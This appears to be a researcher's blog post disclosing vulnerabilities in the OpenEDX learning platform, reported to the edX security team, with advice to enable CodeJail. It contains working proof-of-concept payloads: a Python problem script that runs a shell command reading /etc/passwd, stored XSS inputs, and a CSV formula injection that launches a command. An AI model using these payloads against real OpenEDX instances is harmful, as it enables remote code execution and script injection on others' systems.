How I found a Remote Code Execution in OpenEDX

How I found a Remote Code Execution in OpenEDX

OpenEDX platform is really cool Learning Management System, which is also Open source (this time I was testing the Ironwood release 2.5). You can check it out here: https://open.edx.org/the-platform/ When I was using it, I decided to check for their security. So I followed my normal approach: first mapping the app, writing down which functionalities it had, blackbox testing, and then whitebox.

As you can see here: https://github.com/edx/edx-platform the whole platform is written in Python (in which I don’t have many experience reviewing code). So I decided to go completely blackbox this time. As I really needed to know all the functionalities in depth, I went to the official documentation:

https://edx.readthedocs.io/projects/open-edx-building-and-running-a-course/en/latest/index.html

So after some time digging in the docs I found this:

So it turns out that if you create an account in the OpenEDX platform instance and go to the Studio, create a Course, Create a Unit in the course and add a Problem. And if you choose Custom Python-Evaluated problem and use a payload such as:

<problem>

<script type="python">
def test_add(expect,ans):
    os.system("cat /etc/passwd > /tmp/test_rce")
    
</script>

<p>Problem text</p>
<customresponse cfn="test_add" expect="20">
        <textline size="10" correct_answer="11" label="Integer #1"/><br/>
        <textline size="10" correct_answer="9" label="Integer #2"/>
</customresponse>

    <solution>
        <div class="detailed-solution">
          <p>Solution or Explanation Heading</p>
          <p>Solution or explanation text</p>
        </div>
    </solution>
</problem>

And click the Submit button, you can execute code in the machine.

So when I discovered this, I contacted EDX’s security team and they told me that there is a mitigation for this kind of issues, but it is not enabled by default:

https://github.com/edx/codejail

Apart from this vulnerability I also found a stored XSS. In EDX STUDIO>CONTENT> FILE UPLOADS> Upload an SVG XSS file. And also 2 more XSS:

1) EDX STUDIO>COURSENAME>CONTENT> UPDATES > Press the edit button and replace the default thing with <img src=x onerror=alert(0)>

2) Finally in EDX STUDIO>COURSENAME>SETTINGS>

Finally I found a CSV injection as well:

Course >Instructor>Cohorts>Add cohort with the payload (ex: =cmd|’ /C notepad’!’A1’)>Add your user to the cohort Course>Data Downloads>Reports>Download profile info as CSV>The file is generated below, open in Excel 2016, Data>Import data from file>Choose CSV>Using comma as delimiter.

So, that was all for today. Please make sure you enable CodeJail while using OpenEDX platform. Thanks for reading the post ;)